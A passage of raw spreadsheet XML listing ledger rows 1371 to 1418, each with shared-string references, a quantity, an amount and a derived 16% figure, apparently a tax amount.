      <c r="I1371" s="14">
        <v>3760.68</v>
      </c>
      <c r="J1371" s="15">
        <v>601.7088</v>
      </c>
      <c r="K1371" s="16"/>
    </row>
    <row r="1372" spans="2:11">
      <c r="B1372" s="9">
        <v>1406</v>
      </c>
      <c r="C1372" s="238" t="s">
        <v>8437</v>
      </c>
      <c r="D1372" s="238" t="s">
        <v>8438</v>
      </c>
      <c r="E1372" s="238" t="s">
        <v>4735</v>
      </c>
      <c r="F1372" s="238" t="s">
        <v>8439</v>
      </c>
      <c r="G1372" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H1372" s="10">
        <v>3</v>
      </c>
      <c r="I1372" s="14">
        <v>8974.36</v>
      </c>
      <c r="J1372" s="15">
        <v>1435.896</v>
      </c>
      <c r="K1372" s="16"/>
    </row>
    <row r="1373" spans="2:11">
      <c r="B1373" s="9">
        <v>1407</v>
      </c>
      <c r="C1373" s="238" t="s">
        <v>8440</v>
      </c>
      <c r="D1373" s="238" t="s">
        <v>8441</v>
      </c>
      <c r="E1373" s="238" t="s">
        <v>8147</v>
      </c>
      <c r="F1373" s="238" t="s">
        <v>8442</v>
      </c>
      <c r="G1373" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1373" s="10">
        <v>1</v>
      </c>
      <c r="I1373" s="14">
        <v>131.41</v>
      </c>
      <c r="J1373" s="15">
        <v>21.0256</v>
      </c>
      <c r="K1373" s="16"/>
    </row>
    <row r="1374" spans="2:11">
      <c r="B1374" s="9">
        <v>1408</v>
      </c>
      <c r="C1374" s="238" t="s">
        <v>8443</v>
      </c>
      <c r="D1374" s="238" t="s">
        <v>8444</v>
      </c>
      <c r="E1374" s="238" t="s">
        <v>8445</v>
      </c>
      <c r="F1374" s="238" t="s">
        <v>8446</v>
      </c>
      <c r="G1374" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1374" s="10">
        <v>3</v>
      </c>
      <c r="I1374" s="14">
        <v>225.62</v>
      </c>
      <c r="J1374" s="15">
        <v>36.1008</v>
      </c>
      <c r="K1374" s="16"/>
    </row>
    <row r="1375" spans="2:11">
      <c r="B1375" s="9">
        <v>1409</v>
      </c>
      <c r="C1375" s="238" t="s">
        <v>8447</v>
      </c>
      <c r="D1375" s="238" t="s">
        <v>8448</v>
      </c>
      <c r="E1375" s="238" t="s">
        <v>6224</v>
      </c>
      <c r="F1375" s="238" t="s">
        <v>8449</v>
      </c>
      <c r="G1375" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1375" s="10">
        <v>10</v>
      </c>
      <c r="I1375" s="14">
        <v>1324.14</v>
      </c>
      <c r="J1375" s="15">
        <v>211.856</v>
      </c>
      <c r="K1375" s="16"/>
    </row>
    <row r="1376" spans="2:11">
      <c r="B1376" s="9">
        <v>1410</v>
      </c>
      <c r="C1376" s="238" t="s">
        <v>8450</v>
      </c>
      <c r="D1376" s="238" t="s">
        <v>8451</v>
      </c>
      <c r="E1376" s="238" t="s">
        <v>4909</v>
      </c>
      <c r="F1376" s="238" t="s">
        <v>8452</v>
      </c>
      <c r="G1376" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1376" s="10">
        <v>131</v>
      </c>
      <c r="I1376" s="14">
        <v>4478.49</v>
      </c>
      <c r="J1376" s="15">
        <v>716.6224</v>
      </c>
      <c r="K1376" s="16"/>
    </row>
    <row r="1377" spans="2:11">
      <c r="B1377" s="9">
        <v>1411</v>
      </c>
      <c r="C1377" s="238" t="s">
        <v>8453</v>
      </c>
      <c r="D1377" s="238" t="s">
        <v>8454</v>
      </c>
      <c r="E1377" s="238" t="s">
        <v>8455</v>
      </c>
      <c r="F1377" s="238" t="s">
        <v>8456</v>
      </c>
      <c r="G1377" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1377" s="10">
        <v>2</v>
      </c>
      <c r="I1377" s="14">
        <v>2991.45</v>
      </c>
      <c r="J1377" s="15">
        <v>478.6336</v>
      </c>
      <c r="K1377" s="16"/>
    </row>
    <row r="1378" spans="2:11">
      <c r="B1378" s="9">
        <v>1412</v>
      </c>
      <c r="C1378" s="238" t="s">
        <v>8457</v>
      </c>
      <c r="D1378" s="238" t="s">
        <v>8458</v>
      </c>
      <c r="E1378" s="238" t="s">
        <v>8459</v>
      </c>
      <c r="F1378" s="238" t="s">
        <v>8460</v>
      </c>
      <c r="G1378" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1378" s="10">
        <v>2</v>
      </c>
      <c r="I1378" s="14">
        <v>604.66</v>
      </c>
      <c r="J1378" s="15">
        <v>96.7456</v>
      </c>
      <c r="K1378" s="16"/>
    </row>
    <row r="1379" spans="2:11">
      <c r="B1379" s="9">
        <v>1413</v>
      </c>
      <c r="C1379" s="238" t="s">
        <v>8461</v>
      </c>
      <c r="D1379" s="238" t="s">
        <v>8462</v>
      </c>
      <c r="E1379" s="238" t="s">
        <v>7227</v>
      </c>
      <c r="F1379" s="238" t="s">
        <v>8463</v>
      </c>
      <c r="G1379" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1379" s="10">
        <v>54</v>
      </c>
      <c r="I1379" s="14">
        <v>3530.8</v>
      </c>
      <c r="J1379" s="15">
        <v>564.9696</v>
      </c>
      <c r="K1379" s="16"/>
    </row>
    <row r="1380" spans="2:11">
      <c r="B1380" s="9">
        <v>1414</v>
      </c>
      <c r="C1380" s="238" t="s">
        <v>8464</v>
      </c>
      <c r="D1380" s="238" t="s">
        <v>8465</v>
      </c>
      <c r="E1380" s="238" t="s">
        <v>8466</v>
      </c>
      <c r="F1380" s="238" t="s">
        <v>8467</v>
      </c>
      <c r="G1380" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1380" s="10">
        <v>2</v>
      </c>
      <c r="I1380" s="14">
        <v>820.51</v>
      </c>
      <c r="J1380" s="15">
        <v>131.2832</v>
      </c>
      <c r="K1380" s="16"/>
    </row>
    <row r="1381" spans="2:11">
      <c r="B1381" s="9">
        <v>1415</v>
      </c>
      <c r="C1381" s="238" t="s">
        <v>8468</v>
      </c>
      <c r="D1381" s="238" t="s">
        <v>8469</v>
      </c>
      <c r="E1381" s="238" t="s">
        <v>8470</v>
      </c>
      <c r="F1381" s="238" t="s">
        <v>8471</v>
      </c>
      <c r="G1381" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H1381" s="10">
        <v>1</v>
      </c>
      <c r="I1381" s="14">
        <v>1025.64</v>
      </c>
      <c r="J1381" s="15">
        <v>164.1024</v>
      </c>
      <c r="K1381" s="16"/>
    </row>
    <row r="1382" spans="2:11">
      <c r="B1382" s="9">
        <v>1416</v>
      </c>
      <c r="C1382" s="238" t="s">
        <v>8472</v>
      </c>
      <c r="D1382" s="238" t="s">
        <v>8473</v>
      </c>
      <c r="E1382" s="238" t="s">
        <v>8474</v>
      </c>
      <c r="F1382" s="238" t="s">
        <v>721</v>
      </c>
      <c r="G1382" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H1382" s="10">
        <v>1</v>
      </c>
      <c r="I1382" s="14">
        <v>982.91</v>
      </c>
      <c r="J1382" s="15">
        <v>157.2656</v>
      </c>
      <c r="K1382" s="16"/>
    </row>
    <row r="1383" spans="2:11">
      <c r="B1383" s="9">
        <v>1417</v>
      </c>
      <c r="C1383" s="238" t="s">
        <v>8475</v>
      </c>
      <c r="D1383" s="238" t="s">
        <v>8476</v>
      </c>
      <c r="E1383" s="238" t="s">
        <v>8477</v>
      </c>
      <c r="F1383" s="238" t="s">
        <v>721</v>
      </c>
      <c r="G1383" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H1383" s="10">
        <v>1</v>
      </c>
      <c r="I1383" s="14">
        <v>1111.11</v>
      </c>
      <c r="J1383" s="15">
        <v>177.7776</v>
      </c>
      <c r="K1383" s="16"/>
    </row>
    <row r="1384" spans="2:11">
      <c r="B1384" s="9">
        <v>1418</v>
      </c>
      <c r="C1384" s="238" t="s">
        <v>8478</v>
      </c>
      <c r="D1384" s="238" t="s">
        <v>8479</v>
      </c>
      <c r="E1384" s="238" t="s">
        <v>4837</v>
      </c>
      <c r="F1384" s="238" t="s">
        <v>721</v>
      </c>
      <c r="G1384" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1384" s="10">
        <v>1</v>
      </c>
      <c r="I1384" s="14">
        <v>410.26</v>
      </c>
      <c r="J1384" s="15">
        <v>65.6416</v>
      </c>
      <c r="K1384" s="16"/>
    </row>
    <row r="1385" spans="2:11">
      <c r="B1385" s="9">
        <v>1419</v>
      </c>
      <c r="C1385" s="238" t="s">
        <v>8480</v>
      </c>
      <c r="D1385" s="238" t="s">
        <v>8481</v>
      </c>
      <c r="E1385" s="238" t="s">
        <v>8482</v>
      </c>
      <c r="F1385" s="238" t="s">
        <v>721</v>
      </c>
      <c r="G1385" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1385" s="10">
        <v>1</v>
      </c>
      <c r="I1385" s="14">
        <v>11111.11</v>
      </c>
      <c r="J1385" s="15">
        <v>1777.7776</v>
      </c>
      <c r="K1385" s="16"/>
    </row>
    <row r="1386" spans="2:11">
      <c r="B1386" s="9">
        <v>1420</v>
      </c>
      <c r="C1386" s="238" t="s">
        <v>8483</v>
      </c>
      <c r="D1386" s="238" t="s">
        <v>8484</v>
      </c>
      <c r="E1386" s="238" t="s">
        <v>8485</v>
      </c>
      <c r="F1386" s="238" t="s">
        <v>721</v>
      </c>
      <c r="G1386" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1386" s="10">
        <v>2</v>
      </c>
      <c r="I1386" s="14">
        <v>7179.48</v>
      </c>
      <c r="J1386" s="15">
        <v>1148.7168</v>
      </c>
      <c r="K1386" s="16"/>
    </row>
    <row r="1387" spans="2:11">
      <c r="B1387" s="9">
        <v>1421</v>
      </c>
      <c r="C1387" s="238" t="s">
        <v>8486</v>
      </c>
      <c r="D1387" s="238" t="s">
        <v>8487</v>
      </c>
      <c r="E1387" s="238" t="s">
        <v>4939</v>
      </c>
      <c r="F1387" s="238" t="s">
        <v>721</v>
      </c>
      <c r="G1387" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H1387" s="10">
        <v>2</v>
      </c>
      <c r="I1387" s="14">
        <v>7692.3</v>
      </c>
      <c r="J1387" s="15">
        <v>1230.768</v>
      </c>
      <c r="K1387" s="16"/>
    </row>
    <row r="1388" spans="2:11">
      <c r="B1388" s="9">
        <v>1422</v>
      </c>
      <c r="C1388" s="238" t="s">
        <v>8488</v>
      </c>
      <c r="D1388" s="238" t="s">
        <v>8489</v>
      </c>
      <c r="E1388" s="238" t="s">
        <v>4942</v>
      </c>
      <c r="F1388" s="238" t="s">
        <v>721</v>
      </c>
      <c r="G1388" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1388" s="10">
        <v>4</v>
      </c>
      <c r="I1388" s="14">
        <v>7521.36</v>
      </c>
      <c r="J1388" s="15">
        <v>1203.4176</v>
      </c>
      <c r="K1388" s="16"/>
    </row>
    <row r="1389" spans="2:11">
      <c r="B1389" s="9">
        <v>1423</v>
      </c>
      <c r="C1389" s="238" t="s">
        <v>8490</v>
      </c>
      <c r="D1389" s="238" t="s">
        <v>6718</v>
      </c>
      <c r="E1389" s="238" t="s">
        <v>6719</v>
      </c>
      <c r="F1389" s="238" t="s">
        <v>721</v>
      </c>
      <c r="G1389" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H1389" s="10">
        <v>1</v>
      </c>
      <c r="I1389" s="14">
        <v>6495.73</v>
      </c>
      <c r="J1389" s="15">
        <v>1039.3168</v>
      </c>
      <c r="K1389" s="16"/>
    </row>
    <row r="1390" spans="2:11">
      <c r="B1390" s="9">
        <v>1424</v>
      </c>
      <c r="C1390" s="238" t="s">
        <v>8491</v>
      </c>
      <c r="D1390" s="238" t="s">
        <v>4941</v>
      </c>
      <c r="E1390" s="238" t="s">
        <v>4942</v>
      </c>
      <c r="F1390" s="238" t="s">
        <v>8492</v>
      </c>
      <c r="G1390" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1390" s="10">
        <v>1</v>
      </c>
      <c r="I1390" s="14">
        <v>2649.57</v>
      </c>
      <c r="J1390" s="15">
        <v>423.9312</v>
      </c>
      <c r="K1390" s="16"/>
    </row>
    <row r="1391" spans="2:11">
      <c r="B1391" s="9">
        <v>1425</v>
      </c>
      <c r="C1391" s="238" t="s">
        <v>8493</v>
      </c>
      <c r="D1391" s="238" t="s">
        <v>8494</v>
      </c>
      <c r="E1391" s="238" t="s">
        <v>5028</v>
      </c>
      <c r="F1391" s="238" t="s">
        <v>8495</v>
      </c>
      <c r="G1391" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1391" s="10">
        <v>2</v>
      </c>
      <c r="I1391" s="14">
        <v>1322.79</v>
      </c>
      <c r="J1391" s="15">
        <v>211.648</v>
      </c>
      <c r="K1391" s="16"/>
    </row>
    <row r="1392" spans="2:11">
      <c r="B1392" s="9">
        <v>1426</v>
      </c>
      <c r="C1392" s="238" t="s">
        <v>8496</v>
      </c>
      <c r="D1392" s="238" t="s">
        <v>8497</v>
      </c>
      <c r="E1392" s="238" t="s">
        <v>4681</v>
      </c>
      <c r="F1392" s="238" t="s">
        <v>8492</v>
      </c>
      <c r="G1392" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H1392" s="10">
        <v>2</v>
      </c>
      <c r="I1392" s="14">
        <v>19658.12</v>
      </c>
      <c r="J1392" s="15">
        <v>3145.2992</v>
      </c>
      <c r="K1392" s="16"/>
    </row>
    <row r="1393" spans="2:11">
      <c r="B1393" s="9">
        <v>1427</v>
      </c>
      <c r="C1393" s="238" t="s">
        <v>8498</v>
      </c>
      <c r="D1393" s="238" t="s">
        <v>4947</v>
      </c>
      <c r="E1393" s="238" t="s">
        <v>4702</v>
      </c>
      <c r="F1393" s="9"/>
      <c r="G1393" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1393" s="10">
        <v>3</v>
      </c>
      <c r="I1393" s="14">
        <v>967.51</v>
      </c>
      <c r="J1393" s="15">
        <v>154.8</v>
      </c>
      <c r="K1393" s="16"/>
    </row>
    <row r="1394" spans="2:11">
      <c r="B1394" s="9">
        <v>1428</v>
      </c>
      <c r="C1394" s="238" t="s">
        <v>8499</v>
      </c>
      <c r="D1394" s="238" t="s">
        <v>8500</v>
      </c>
      <c r="E1394" s="238" t="s">
        <v>8501</v>
      </c>
      <c r="F1394" s="238" t="s">
        <v>8492</v>
      </c>
      <c r="G1394" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H1394" s="10">
        <v>1</v>
      </c>
      <c r="I1394" s="14">
        <v>683.76</v>
      </c>
      <c r="J1394" s="15">
        <v>109.4016</v>
      </c>
      <c r="K1394" s="16"/>
    </row>
    <row r="1395" spans="2:11">
      <c r="B1395" s="9">
        <v>1429</v>
      </c>
      <c r="C1395" s="238" t="s">
        <v>8502</v>
      </c>
      <c r="D1395" s="238" t="s">
        <v>8503</v>
      </c>
      <c r="E1395" s="238" t="s">
        <v>8504</v>
      </c>
      <c r="F1395" s="238" t="s">
        <v>8492</v>
      </c>
      <c r="G1395" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H1395" s="10">
        <v>2</v>
      </c>
      <c r="I1395" s="14">
        <v>547.01</v>
      </c>
      <c r="J1395" s="15">
        <v>87.5232</v>
      </c>
      <c r="K1395" s="16"/>
    </row>
    <row r="1396" spans="2:11">
      <c r="B1396" s="9">
        <v>1430</v>
      </c>
      <c r="C1396" s="238" t="s">
        <v>8505</v>
      </c>
      <c r="D1396" s="238" t="s">
        <v>8506</v>
      </c>
      <c r="E1396" s="238" t="s">
        <v>5028</v>
      </c>
      <c r="F1396" s="238" t="s">
        <v>8507</v>
      </c>
      <c r="G1396" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1396" s="10">
        <v>3</v>
      </c>
      <c r="I1396" s="14">
        <v>2581.19</v>
      </c>
      <c r="J1396" s="15">
        <v>412.992</v>
      </c>
      <c r="K1396" s="16"/>
    </row>
    <row r="1397" spans="2:11">
      <c r="B1397" s="9">
        <v>1431</v>
      </c>
      <c r="C1397" s="238" t="s">
        <v>8508</v>
      </c>
      <c r="D1397" s="238" t="s">
        <v>804</v>
      </c>
      <c r="E1397" s="238" t="s">
        <v>4939</v>
      </c>
      <c r="F1397" s="238" t="s">
        <v>804</v>
      </c>
      <c r="G1397" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H1397" s="10">
        <v>1</v>
      </c>
      <c r="I1397" s="14">
        <v>982.9</v>
      </c>
      <c r="J1397" s="15">
        <v>157.264</v>
      </c>
      <c r="K1397" s="16"/>
    </row>
    <row r="1398" spans="2:11">
      <c r="B1398" s="9">
        <v>1432</v>
      </c>
      <c r="C1398" s="238" t="s">
        <v>8509</v>
      </c>
      <c r="D1398" s="238" t="s">
        <v>8510</v>
      </c>
      <c r="E1398" s="238" t="s">
        <v>5028</v>
      </c>
      <c r="F1398" s="238" t="s">
        <v>8511</v>
      </c>
      <c r="G1398" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1398" s="10">
        <v>2</v>
      </c>
      <c r="I1398" s="14">
        <v>1396.01</v>
      </c>
      <c r="J1398" s="15">
        <v>223.3632</v>
      </c>
      <c r="K1398" s="16"/>
    </row>
    <row r="1399" spans="2:11">
      <c r="B1399" s="9">
        <v>1433</v>
      </c>
      <c r="C1399" s="238" t="s">
        <v>8512</v>
      </c>
      <c r="D1399" s="238" t="s">
        <v>8513</v>
      </c>
      <c r="E1399" s="238" t="s">
        <v>4681</v>
      </c>
      <c r="F1399" s="238" t="s">
        <v>3423</v>
      </c>
      <c r="G1399" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1399" s="10">
        <v>1</v>
      </c>
      <c r="I1399" s="14">
        <v>7521.37</v>
      </c>
      <c r="J1399" s="15">
        <v>1203.4192</v>
      </c>
      <c r="K1399" s="16"/>
    </row>
    <row r="1400" spans="2:11">
      <c r="B1400" s="9">
        <v>1434</v>
      </c>
      <c r="C1400" s="238" t="s">
        <v>8514</v>
      </c>
      <c r="D1400" s="238" t="s">
        <v>8515</v>
      </c>
      <c r="E1400" s="238" t="s">
        <v>5028</v>
      </c>
      <c r="F1400" s="238" t="s">
        <v>8516</v>
      </c>
      <c r="G1400" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1400" s="10">
        <v>2</v>
      </c>
      <c r="I1400" s="14">
        <v>8547.01</v>
      </c>
      <c r="J1400" s="15">
        <v>1367.5232</v>
      </c>
      <c r="K1400" s="16"/>
    </row>
    <row r="1401" spans="2:11">
      <c r="B1401" s="9">
        <v>1435</v>
      </c>
      <c r="C1401" s="238" t="s">
        <v>8517</v>
      </c>
      <c r="D1401" s="238" t="s">
        <v>8518</v>
      </c>
      <c r="E1401" s="238" t="s">
        <v>4942</v>
      </c>
      <c r="F1401" s="238" t="s">
        <v>8519</v>
      </c>
      <c r="G1401" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1401" s="10">
        <v>2</v>
      </c>
      <c r="I1401" s="14">
        <v>3333.32</v>
      </c>
      <c r="J1401" s="15">
        <v>533.3312</v>
      </c>
      <c r="K1401" s="16"/>
    </row>
    <row r="1402" spans="2:11">
      <c r="B1402" s="9">
        <v>1436</v>
      </c>
      <c r="C1402" s="238" t="s">
        <v>8520</v>
      </c>
      <c r="D1402" s="238" t="s">
        <v>8521</v>
      </c>
      <c r="E1402" s="238" t="s">
        <v>4952</v>
      </c>
      <c r="F1402" s="238" t="s">
        <v>8519</v>
      </c>
      <c r="G1402" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H1402" s="10">
        <v>1</v>
      </c>
      <c r="I1402" s="14">
        <v>2136.75</v>
      </c>
      <c r="J1402" s="15">
        <v>341.88</v>
      </c>
      <c r="K1402" s="16"/>
    </row>
    <row r="1403" spans="2:11">
      <c r="B1403" s="9">
        <v>1437</v>
      </c>
      <c r="C1403" s="238" t="s">
        <v>8522</v>
      </c>
      <c r="D1403" s="238" t="s">
        <v>8523</v>
      </c>
      <c r="E1403" s="238" t="s">
        <v>4747</v>
      </c>
      <c r="F1403" s="238" t="s">
        <v>3423</v>
      </c>
      <c r="G1403" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1403" s="10">
        <v>2</v>
      </c>
      <c r="I1403" s="14">
        <v>1025.64</v>
      </c>
      <c r="J1403" s="15">
        <v>164.1024</v>
      </c>
      <c r="K1403" s="16"/>
    </row>
    <row r="1404" spans="2:11">
      <c r="B1404" s="9">
        <v>1438</v>
      </c>
      <c r="C1404" s="238" t="s">
        <v>8524</v>
      </c>
      <c r="D1404" s="238" t="s">
        <v>8525</v>
      </c>
      <c r="E1404" s="238" t="s">
        <v>4942</v>
      </c>
      <c r="F1404" s="238" t="s">
        <v>1318</v>
      </c>
      <c r="G1404" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1404" s="10">
        <v>6</v>
      </c>
      <c r="I1404" s="14">
        <v>564.09</v>
      </c>
      <c r="J1404" s="15">
        <v>90.2592</v>
      </c>
      <c r="K1404" s="16"/>
    </row>
    <row r="1405" spans="2:11">
      <c r="B1405" s="9">
        <v>1439</v>
      </c>
      <c r="C1405" s="238" t="s">
        <v>8526</v>
      </c>
      <c r="D1405" s="238" t="s">
        <v>8527</v>
      </c>
      <c r="E1405" s="238" t="s">
        <v>4939</v>
      </c>
      <c r="F1405" s="238" t="s">
        <v>1318</v>
      </c>
      <c r="G1405" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1405" s="10">
        <v>1</v>
      </c>
      <c r="I1405" s="14">
        <v>186.8</v>
      </c>
      <c r="J1405" s="15">
        <v>29.888</v>
      </c>
      <c r="K1405" s="16"/>
    </row>
    <row r="1406" spans="2:11">
      <c r="B1406" s="9">
        <v>1440</v>
      </c>
      <c r="C1406" s="238" t="s">
        <v>8528</v>
      </c>
      <c r="D1406" s="238" t="s">
        <v>8529</v>
      </c>
      <c r="E1406" s="238" t="s">
        <v>4942</v>
      </c>
      <c r="F1406" s="238" t="s">
        <v>8530</v>
      </c>
      <c r="G1406" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1406" s="10">
        <v>2</v>
      </c>
      <c r="I1406" s="14">
        <v>786.32</v>
      </c>
      <c r="J1406" s="15">
        <v>125.8112</v>
      </c>
      <c r="K1406" s="16"/>
    </row>
    <row r="1407" spans="2:11">
      <c r="B1407" s="9">
        <v>1441</v>
      </c>
      <c r="C1407" s="238" t="s">
        <v>8531</v>
      </c>
      <c r="D1407" s="238" t="s">
        <v>8532</v>
      </c>
      <c r="E1407" s="238" t="s">
        <v>8533</v>
      </c>
      <c r="F1407" s="238" t="s">
        <v>8534</v>
      </c>
      <c r="G1407" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1407" s="10">
        <v>6</v>
      </c>
      <c r="I1407" s="14">
        <v>1532.81</v>
      </c>
      <c r="J1407" s="15">
        <v>245.2512</v>
      </c>
      <c r="K1407" s="16"/>
    </row>
    <row r="1408" spans="2:11">
      <c r="B1408" s="9">
        <v>1442</v>
      </c>
      <c r="C1408" s="238" t="s">
        <v>8535</v>
      </c>
      <c r="D1408" s="238" t="s">
        <v>8536</v>
      </c>
      <c r="E1408" s="238" t="s">
        <v>8537</v>
      </c>
      <c r="F1408" s="238" t="s">
        <v>8538</v>
      </c>
      <c r="G1408" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1408" s="10">
        <v>5</v>
      </c>
      <c r="I1408" s="14">
        <v>1361.42</v>
      </c>
      <c r="J1408" s="15">
        <v>217.824</v>
      </c>
      <c r="K1408" s="16"/>
    </row>
    <row r="1409" spans="2:11">
      <c r="B1409" s="9">
        <v>1443</v>
      </c>
      <c r="C1409" s="238" t="s">
        <v>8539</v>
      </c>
      <c r="D1409" s="238" t="s">
        <v>8540</v>
      </c>
      <c r="E1409" s="238" t="s">
        <v>4939</v>
      </c>
      <c r="F1409" s="238" t="s">
        <v>415</v>
      </c>
      <c r="G1409" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H1409" s="10">
        <v>1</v>
      </c>
      <c r="I1409" s="14">
        <v>1401.71</v>
      </c>
      <c r="J1409" s="15">
        <v>224.2736</v>
      </c>
      <c r="K1409" s="16"/>
    </row>
    <row r="1410" spans="2:11">
      <c r="B1410" s="9">
        <v>1444</v>
      </c>
      <c r="C1410" s="238" t="s">
        <v>8541</v>
      </c>
      <c r="D1410" s="238" t="s">
        <v>8542</v>
      </c>
      <c r="E1410" s="238" t="s">
        <v>4681</v>
      </c>
      <c r="F1410" s="238" t="s">
        <v>620</v>
      </c>
      <c r="G1410" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1410" s="10">
        <v>1</v>
      </c>
      <c r="I1410" s="14">
        <v>2957.26</v>
      </c>
      <c r="J1410" s="15">
        <v>473.1616</v>
      </c>
      <c r="K1410" s="16"/>
    </row>
    <row r="1411" spans="2:11">
      <c r="B1411" s="9">
        <v>1445</v>
      </c>
      <c r="C1411" s="238" t="s">
        <v>8543</v>
      </c>
      <c r="D1411" s="238" t="s">
        <v>8544</v>
      </c>
      <c r="E1411" s="238" t="s">
        <v>5149</v>
      </c>
      <c r="F1411" s="238" t="s">
        <v>8534</v>
      </c>
      <c r="G1411" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1411" s="10">
        <v>2</v>
      </c>
      <c r="I1411" s="14">
        <v>2632.48</v>
      </c>
      <c r="J1411" s="15">
        <v>421.1968</v>
      </c>
      <c r="K1411" s="16"/>
    </row>
    <row r="1412" spans="2:11">
      <c r="B1412" s="9">
        <v>1446</v>
      </c>
      <c r="C1412" s="238" t="s">
        <v>8545</v>
      </c>
      <c r="D1412" s="238" t="s">
        <v>8546</v>
      </c>
      <c r="E1412" s="238" t="s">
        <v>8547</v>
      </c>
      <c r="F1412" s="9"/>
      <c r="G1412" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1412" s="10">
        <v>10</v>
      </c>
      <c r="I1412" s="14">
        <v>128.21</v>
      </c>
      <c r="J1412" s="15">
        <v>20.512</v>
      </c>
      <c r="K1412" s="16"/>
    </row>
    <row r="1413" spans="2:11">
      <c r="B1413" s="9">
        <v>1447</v>
      </c>
      <c r="C1413" s="238" t="s">
        <v>8548</v>
      </c>
      <c r="D1413" s="238" t="s">
        <v>8549</v>
      </c>
      <c r="E1413" s="238" t="s">
        <v>8455</v>
      </c>
      <c r="F1413" s="238" t="s">
        <v>8550</v>
      </c>
      <c r="G1413" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1413" s="10">
        <v>20</v>
      </c>
      <c r="I1413" s="14">
        <v>2264.88</v>
      </c>
      <c r="J1413" s="15">
        <v>362.368</v>
      </c>
      <c r="K1413" s="16"/>
    </row>
    <row r="1414" spans="2:11">
      <c r="B1414" s="9">
        <v>1448</v>
      </c>
      <c r="C1414" s="238" t="s">
        <v>8551</v>
      </c>
      <c r="D1414" s="238" t="s">
        <v>8552</v>
      </c>
      <c r="E1414" s="238" t="s">
        <v>8553</v>
      </c>
      <c r="F1414" s="238" t="s">
        <v>8554</v>
      </c>
      <c r="G1414" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1414" s="10">
        <v>50</v>
      </c>
      <c r="I1414" s="14">
        <v>811.34</v>
      </c>
      <c r="J1414" s="15">
        <v>129.84</v>
      </c>
      <c r="K1414" s="16"/>
    </row>
    <row r="1415" spans="2:11">
      <c r="B1415" s="9">
        <v>1449</v>
      </c>
      <c r="C1415" s="238" t="s">
        <v>8555</v>
      </c>
      <c r="D1415" s="238" t="s">
        <v>8556</v>
      </c>
      <c r="E1415" s="238" t="s">
        <v>5364</v>
      </c>
      <c r="F1415" s="238" t="s">
        <v>8557</v>
      </c>
      <c r="G1415" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1415" s="10">
        <v>26</v>
      </c>
      <c r="I1415" s="14">
        <v>1037.78</v>
      </c>
      <c r="J1415" s="15">
        <v>166.0256</v>
      </c>
      <c r="K1415" s="16"/>
    </row>
    <row r="1416" spans="2:11">
      <c r="B1416" s="9">
        <v>1450</v>
      </c>
      <c r="C1416" s="238" t="s">
        <v>8558</v>
      </c>
      <c r="D1416" s="238" t="s">
        <v>8559</v>
      </c>
      <c r="E1416" s="238" t="s">
        <v>5192</v>
      </c>
      <c r="F1416" s="9"/>
      <c r="G1416" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1416" s="10">
        <v>414</v>
      </c>
      <c r="I1416" s="14">
        <v>2181.21</v>
      </c>
      <c r="J1416" s="15">
        <v>349.0848</v>
      </c>
      <c r="K1416" s="16"/>
    </row>
    <row r="1417" spans="2:11">
      <c r="B1417" s="9">
        <v>1451</v>
      </c>
      <c r="C1417" s="238" t="s">
        <v>8560</v>
      </c>
      <c r="D1417" s="238" t="s">
        <v>8561</v>
      </c>
      <c r="E1417" s="238" t="s">
        <v>4735</v>
      </c>
      <c r="F1417" s="9"/>
      <c r="G1417" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H1417" s="10">
        <v>6</v>
      </c>
      <c r="I1417" s="14">
        <v>9646.17</v>
      </c>
      <c r="J1417" s="15">
        <v>1543.392</v>
      </c>
      <c r="K1417" s="16"/>
    </row>
    <row r="1418" spans="2:11">
      <c r="B1418" s="9">
        <v>1452</v>
      </c>
      <c r="C1418" s="238" t="s">
        <v>8562</v>
      </c>
      <c r="D1418" s="238" t="s">
        <v>8561</v>
      </c>
      <c r="E1418" s="238" t="s">
        <v>4735</v>
      </c>
      <c r="F1418" s="238" t="s">
        <v>8563</v>
      </c>
      <c r="G1418" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H1418" s="10">
        <v>4</v>
      </c>
      <c r="I1418" s="14">
        <v>5710.26</v>
      </c>
      <c r="J1418" s="15">
